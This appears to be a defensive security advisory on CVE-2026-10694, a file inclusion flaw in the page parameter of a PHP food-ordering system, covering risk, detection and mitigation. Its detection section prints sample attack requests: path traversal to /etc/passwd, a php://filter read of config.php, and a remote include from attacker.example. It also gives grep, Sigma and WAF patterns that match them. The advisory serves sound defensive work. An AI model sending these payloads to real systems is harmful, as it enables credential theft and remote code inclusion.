CVE-2026-10694: File Inclusion in SourceCodester System
| Field | Value |
|---|---|
| CVE ID | CVE-2026-10694 |
| CVSS score | 7.3 High |
| Attack vector | Remote |
| Auth required | Unknown from available references; defenders should assume unauthenticated reachability until verified otherwise |
| Patch status | No official patch or fixed version confirmed from accessible sources |
TL;DR - Public exploit material exists for CVE-2026-10694. - Confirmed affected version is SourceCodester Online Food Ordering System 2.0. - No verified fix is available, so restrict access and harden
index.phphandling now.
What this vulnerability is and why it matters
CVE-2026-10694 is a file inclusion issue in SourceCodester Online Food Ordering System 2.0. According to the NVD description, the vulnerable code path is the include logic in /index.php, where manipulation of the page parameter can result in file inclusion. That places this bug in the local file inclusion or remote file inclusion class, depending on application behavior and PHP configuration. The important operational point is straightforward: user-controlled input appears to influence an include operation without sufficient validation.
For defenders, this is not just an abstract PHP bug class. File inclusion flaws often become a pivot point for reading application files, exposing configuration data, leaking credentials, or chaining into code execution in weakly configured environments. Even when direct remote code execution is not proven, a web app that allows arbitrary local file inclusion can still expose database credentials, internal paths, session files, or deployment secrets. In a small business or self-hosted environment, that can be enough to compromise the entire application stack.
The NVD entry explicitly says that public exploit material exists. That raises urgency even though there is no current CISA Known Exploited Vulnerabilities listing for this CVE. Practically, that means defenders should not wait for confirmed in-the-wild exploitation before taking action. Public writeups and proof-of-concept material frequently lead to low-effort scanning and opportunistic attacks, especially against internet-exposed PHP applications.
Affected versions and fix status
The confirmed affected product is SourceCodester Online Food Ordering System 2.0. Based on the accessible references in the research note, version 2.0 is affected, and no broader affected range could be verified. There is not enough source material to responsibly claim that earlier versions are vulnerable, nor to claim that any later release is unaffected. If you run a fork, customized deployment, or similarly named SourceCodester project, you should compare your index.php include handling manually rather than relying on version naming alone.
A key limitation here is patch intelligence. No official patch or fixed version number could be confirmed from the available sources. That means there is no verified statement such as “fixed in version X.Y” that can be safely published. Where fix information is unknown, defenders should assume the issue remains open in the publicly available 2.0 codebase until they can inspect their local copy or obtain vendor guidance. In practical terms, that means mitigation has to focus on configuration, code hardening, and exposure reduction rather than a neat upgrade path.
If your organization tracks vulnerability status formally, record the state as: affected version confirmed: 2.0; fixed version: unknown; patch availability: unconfirmed. That wording is more useful than forcing false precision. It also helps change management teams understand why compensating controls may be needed immediately.
Exploitation status and operational risk
The best-supported current statement is: public exploit material exists, but active exploitation in the wild is not confirmed from CISA KEV. The NVD description says, “The exploit is now public and may be used.” That is enough to treat this as a real, usable attack path. It is not enough to claim mass exploitation, ransomware use, or confirmed intrusions. Those stronger claims would be speculative and should be avoided.
Because the vulnerability is remotely reachable and tied to a query parameter, it is likely to be easy to test by attackers. Internet-facing applications built from public PHP projects are frequently scanned by automated tooling. Even when a vulnerability is not yet listed in KEV, attackers may still probe it because public exploit information lowers the cost of weaponization. For defenders, the right response is to assume scan activity is plausible now, not later.
The exact authentication requirement is not explicitly confirmed in the accessible references. The issue is described as remote, and the vulnerable parameter is in /index.php, which often implies front-end reachability. Since the evidence does not definitively state whether a login is required, defenders should assume the conservative case: potentially unauthenticated remote access until proven otherwise by testing. That assumption prevents under-prioritizing an exposed endpoint.
Technical Notes
A typical inclusion risk pattern in PHP looks like this:
<?php
// Unsafe pattern
$page = $_GET['page'];
include($page . ".php");
A safer pattern is to allow only explicit routes:
<?php
$allowed = [
'home' => 'pages/home.php',
'menu' => 'pages/menu.php',
'contact' => 'pages/contact.php'
];
$page = $_GET['page'] ?? 'home';
if (!array_key_exists($page, $allowed)) {
http_response_code(404);
exit('Not found');
}
include $allowed[$page];
What to tell stakeholders
For security teams, the priority message is that this is a high-severity remote file inclusion-class issue with public exploit material and no verified patch. That justifies rapid review of exposure, logs, and code. For IT administrators, the practical ask is to identify any deployed instance of SourceCodester Online Food Ordering System 2.0, confirm whether it is internet accessible, and implement either a code-level allowlist fix or access restrictions immediately.
For business owners or application owners, avoid overclaiming impact. There is no confirmed CISA KEV evidence of active exploitation in the wild at this time, but there is enough public information to make opportunistic attacks plausible. The right posture is urgent remediation with clear documentation of unknowns: confirmed affected version 2.0, no confirmed fixed version, public exploit material exists, and active exploitation is not verified from available sources.
Additional Resources
For further reading on web application security, you can check out our articles on best ZTNA tools in 2026 and CVE-2026-41964.
How to detect attempted exploitation
Detection should focus first on HTTP request telemetry. Because the vulnerable input is the page parameter in /index.php, defenders should look for suspicious requests that attempt traversal, wrapper usage, or direct file inclusion patterns. Common indicators include ../, URL-encoded traversal such as %2e%2e%2f, PHP stream wrappers such as php://, and references to sensitive files like /etc/passwd, win.ini, or application config files. Even if the exact exploit path differs, these request shapes are typical for LFI and RFI probing.
You should also review application behavior around unexpected error messages, warnings, or inclusion failures. PHP applications often emit warnings when an include path is invalid, and those warnings can show up in web server logs, PHP-FPM logs, or the application response itself. Repeated 200, 500, or 404 responses tied to crafted page values can indicate active testing. If your environment sits behind a WAF or reverse proxy, include those logs too; they often preserve full query strings that backend logs may truncate.
A second detection layer is host-level monitoring. File inclusion attempts can produce unusual access to local files by the web server process, especially if the attacker is trying to read configuration files or session data. On Linux, watch for php-fpm, apache2, httpd, or nginx worker contexts touching files outside the normal web root. This is especially useful when request logs are incomplete.
Technical Notes
Example suspicious access log patterns:
GET /index.php?page=../../../../etc/passwd HTTP/1.1
GET /index.php?page=..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
GET /index.php?page=php://filter/convert.base64-encode/resource=config.php HTTP/1.1
GET /index.php?page=http://attacker.example/shell.txt HTTP/1.1
Basic grep triage against Apache or Nginx logs:
grep -E 'GET /index\.php\?page=|POST /index\.php\?page=' /var/log/apache2/access.log \
| grep -E '(\.\./|%2e%2e%2f|php://|file://|https?://|/etc/passwd|win\.ini|config\.php)'
Example Sigma-style logic concept defenders can adapt:
title: Possible LFI or RFI attempt against SourceCodester OFOS
logsource:
category: webserver
detection:
selection1:
cs-uri-stem: "/index.php"
selection2:
cs-uri-query|contains:
- "page=../"
- "page=%2e%2e%2f"
- "page=php://"
- "page=file://"
- "page=http://"
- "page=https://"
- "page=/etc/passwd"
condition: selection1 and selection2
level: high
Mitigation and containment
Because no verified patch or fixed version is currently available, mitigation has to center on compensating controls. The most important step is to stop using user input directly in include or require statements. Replace dynamic include behavior with a strict allowlist of permitted values mapped to fixed file paths. If you maintain the application internally, this code change should be treated as urgent. It removes the vulnerable pattern rather than trying to sanitize every dangerous input string.
If you cannot change code immediately, reduce exposure. Restrict public access to the application through IP allowlisting, VPN access, reverse-proxy access controls, or temporary maintenance windows. At the PHP level, verify that risky settings are not enabling broader abuse. In older environments, allow_url_include should be disabled. Sensitive files should be stored outside the web root, and the web server user should have the minimum read permissions necessary. These controls do not eliminate local file inclusion, but they can significantly reduce blast radius.
For internet-exposed SMB deployments, a WAF rule targeting suspicious page= requests is a practical short-term measure. That should not be treated as a permanent fix, because attackers can vary encoding and payloads, but it can buy time. Also inspect the codebase for any other route parameters feeding include, require, include_once, or require_once, since these projects often reuse the same pattern in multiple files.
Technical Notes
Code-level workaround pattern for /index.php:
<?php
$routes = [
'home' => __DIR__ . '/pages/home.php',
'menu' => __DIR__ . '/pages/menu.php',
'about' => __DIR__ . '/pages/about.php',
'contact' => __DIR__ . '/pages/contact.php'
];
$page = $_GET['page'] ?? 'home';
if (!isset($routes[$page])) {
http_response_code(404);
exit;
}
include $routes[$page];
If the application is deployed from a Git working copy and you need an immediate local fix, the operational sequence is typically:
cd /var/www/html/online-food-ordering-system
cp index.php index.php.bak.$(date +%F)
vi index.php
php -l index.php
systemctl reload apache2 || systemctl reload nginx php8.2-fpm
PHP hardening checks and temporary mitigation:
php -i | grep allow_url_include
php -i | grep allow_url_fopen
If possible, enforce:
; php.ini
allow_url_include = Off
display_errors = Off
Then reload services:
systemctl reload apache2
# or
systemctl reload nginx php8.2-fpm
Example ModSecurity-style emergency rule concept:
SecRule REQUEST_URI "@beginsWith /index.php" "id:1069401,phase:2,deny,status:403,chain"
SecRule ARGS:page "@rx (\./|%2e%2e%2f|php://|file://|https?://)"
References
Primary references for this CVE include the NVD entry, the GitHub issue referenced by NVD, and the VulDB CVE page. Because some referenced materials were inaccessible or incomplete during retrieval, defenders should use these references as starting points and validate against their own codebase and environment.
- NVD CVE record:
https://nvd.nist.gov/vuln/detail/CVE-2026-10694 - GitHub reference noted by NVD:
https://github.com/Mikkoseven/cve/issues/4 - VulDB CVE page:
https://vuldb.com/cve/CVE-2026-10694
This article may contain affiliate links. We earn a commission on qualifying purchases at no extra cost to you.